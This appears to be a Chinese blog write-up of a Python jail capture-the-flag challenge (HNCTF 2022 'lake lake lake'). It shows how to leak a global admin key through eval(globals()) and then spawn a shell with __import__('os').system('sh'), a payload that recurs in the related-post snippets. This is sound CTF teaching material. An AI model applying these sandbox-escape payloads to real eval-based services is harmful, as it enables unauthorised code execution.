【misc】[HNCTF 2022 Week1]lake lake lake(JAIL) --沙盒逃逸,globals函数泄露全局变量

最新推荐文章于 2024-05-19 23:31:32 发布
最新推荐文章于 2024-05-19 23:31:32 发布
阅读量83 收藏
点赞数
文章标签: python 开发语言 安全 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/question55/article/details/134306879
版权

查看附件内容

这道题的逻辑就是可以让你输入1或者2,进入各自的函数去执行功能

func函数:

def func():

    code = input(">")

    if(len(code)>9):

        return print("you're hacker!")

    try:

        print(eval(code))

    except:

        pass

有长度限制,接着再来看backdoor函数:

def backdoor():

    print("Please enter the admin key")

    key = input(">")

    if(key == fake_key_var_in_the_local_but_real_in_the_remote):

        code = input(">")

        try:

            print(eval(code))

        except:

            pass

    else:

        print("Nooo!!!!")

这里没有长度限制,但是得输入key,和设置的key进行对比,可以发现,这个key其实是全局变量,可以再func函数中输入globals()泄露全局变量的值,输入试试

这里已经打印出了key的值,然后在backdoor函数输入这个key,然后再输入__import__('os').system('sh')就可以getshell

 key的值:a34af94e88aed5c34fb5ccfe08cd14ab

GGb0mb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTF-MISC关于各类编码习题(湖工商扛把子)
03-17
MISC章节关于各类编码的练习
PNG图片宽高一把梭 ctf-misc 杂项 直接还原图片原本高度 CRC计算 暴力破解
02-07
ctf-misc 杂项 直接还原图片原本高度 CRC计算 暴力破解 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 ...
misc】[HNCTF 2022 Week1]calc_jail_beginner_level2.5(JAIL) --逃逸,breakpoint函数
question55的博客
11-09 97
_import__('os').system('sh')即可getshell。
misc】[HNCTF 2022 Week1]calc_jail_beginner(JAIL) --逃逸
question55的博客
11-08 91
可以通过其他方式完成。回想一下 import 的原理,本质上就是执行一遍导入的库。这个过程实际上可以用。如果多个空格也过滤了,Python 能够 import 的可不止。
misc】[HNCTF 2022 Week1]python2 input(JAIL) --逃逸,python2环境
question55的博客
11-09 49
查看附件,这次有点不太一样,这次是python2的环境只有一个input函数,但是python2的input函数可是不太一样:在python2中,函数从标准输入接收输入,并且自动求值,返回求出来的值 在python2中,函数从标准输入接收输入,并返回输入字符串 在python3中,函数从标准输入接收输入,并返回输入字符串就是说python2环境下的input函数有执行代码的能力,所以输入__import__('os').system('sh')即可getshell
misc】[HNCTF 2022 Week1]calc_jail_beginner_level3(JAIL) --逃逸,help函数
question55的博客
11-09 65
ls,!cat flag!!lsls!ls!!ls。
misc】[HNCTF 2022 Week1]calc_jail_beginner_level2(JAIL) --逃逸,嵌套执行getshell
question55的博客
11-09 64
查看题目附件这个if语句直接限制了输入的字符串长度不能大于13,像__import__('os').system('sh')现在肯定用不了,但是可以输入eval(input())进行嵌套执行,这句代码的意思相当于input()继续输入字符串,再由eval函数解析执行,所有就没有了字符长度的限制,然后再输入__import__('os').system('sh')即可getshell
攻防世界MISC进阶之Training-Stegano-1
harry_c的博客
08-13 5127
攻防世界MISC进阶之Training-Stegano-1第一步:分析第二步:实操第三步:答案 第一步:分析 难度系数: 1星 题目来源: 暂无 题目描述:这是我能想到的最基础的图片隐写术 题目场景: 暂无 题目附件: 附件1 首先打开题目只有一个附件下载附件,我们看到照片的像素十分低,都无法用windows的编辑器编辑(小于50)。 想到用notepad++看看,一团乱码 第二步:实操 又想到使...
i春秋 Misc Web 爆破-1
Welcome To Myon'Blog !
05-08 1461
PHP常用函数,PHP超全局变量,正则匹配,正则表达式,代码审计
CTFShow-MISC入门篇详细wp(1-56)
热门推荐
Aluxian_的博客
07-19 1万+
cffshow-misc 入门 wp解析
xctf攻防世界 MISC高手进阶区 2-1
l8947943的博客
02-02 1万+
1. 进入环境,下载附件 给的一张png尾缀的文件,尝试双击打开,提示文件已损坏。猜测可能是文件头有问题,因此丢入winhex中,如图: 发现png文件头不对,去搜搜文件格式,进行修改。 2. 问题分析 查阅相关png图片的数据标识,https://blog.csdn.net/zz_Caleb/article/details/89927673: 先详细解释一下png的文件头: (固定)八个字节89 50 4E 47 0D 0A 1A 0A为png的文件头 (固定)四个字节00 00 00 0D(即为十
xorg-x11-fonts-misc-7.5-33.el9.noarch
07-04
xorg-x11-fonts-misc-7.5-33.el9.noarch
攻防世界misc2-1杂项
11-20
攻防世界misc2-1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947409
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
【Python】Python中变量或者函数加下划线‘_‘的含义
yangweipeng708的博客
05-14 678
理解这些约定可以帮助Python开发者编写更清晰、更Pythonic的代码,并理解其他Python代码中的命名习惯。)通常用来指示特定的编程约定或用法,这些约定主要关乎变量函数的可访问性以及预期的使用范围。在Python中,变量函数前面加一个下划线(
python数据分析numpy基础之intersect1d求数组交集
最新发布
sinat_34735632的博客
05-19 194
python的numpy库的intersect1d(x,y)函数,计算x和y的公共元素,并返回去重后的有序结果。相当于求两个数组中的交集,并且进行去重和排序。numpy.intersect1()查找两个数组的公共元素,并且返回去重后的有序结果。ar1,ar2:必选,列表、元组、数组;如果是多维则自动转一维数组;assume_unique:可选,bool,默认False,若为True则可以加快计算素材,此时ar1和ar2需为元素唯一的数组,否则结果不会去重;
windows11 Django环境安装
云深海阔专栏
05-15 162
3)在这个文件夹中使用manager.py和runserver命令运行开发 web 服务器。2)使用 django-admin 工具创建一个名为“mytestsite”的新框架站点。浏览器上访问http://localhost:800。2、windows10 虚拟环境设置。1、验证python和pip3环境。1)创建文件夹及项目目录。4)web浏览器上验证。3、安装Django。
python数据分析——时间序列
qq_74013365的博客
05-14 1996
时间序列是按照时间顺序排列的一系列随时间变化而变化的数据点或观测值。时间序列可以是离散的,例如每月的销售数据,也可以是连续的,例如气温和股票价格等。时间序列常用于预测和分析未来的趋势,例如经济增长、股票走势、天气变化等。时间序列分析是数据分析中的重要部分,它涉及到对随时间变化的数据进行研究,以揭示其内在规律、趋势和周期性变化。Python作为一种强大的编程语言,拥有众多的数据处理和可视化库,如pandasnumpymatplotlib和seaborn等,这些库在处理时间序列数据时表现出色。
攻防世界misc1-misc
08-29
很抱歉,但是根据提供的引用内容,没有找到关于攻防世界misc1-misc的具体信息。如果有更多的信息或者题目细节,请提供更多内容,我会尽力为您解答。<span class="em">1</span><span class="em">2</span><span class=...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值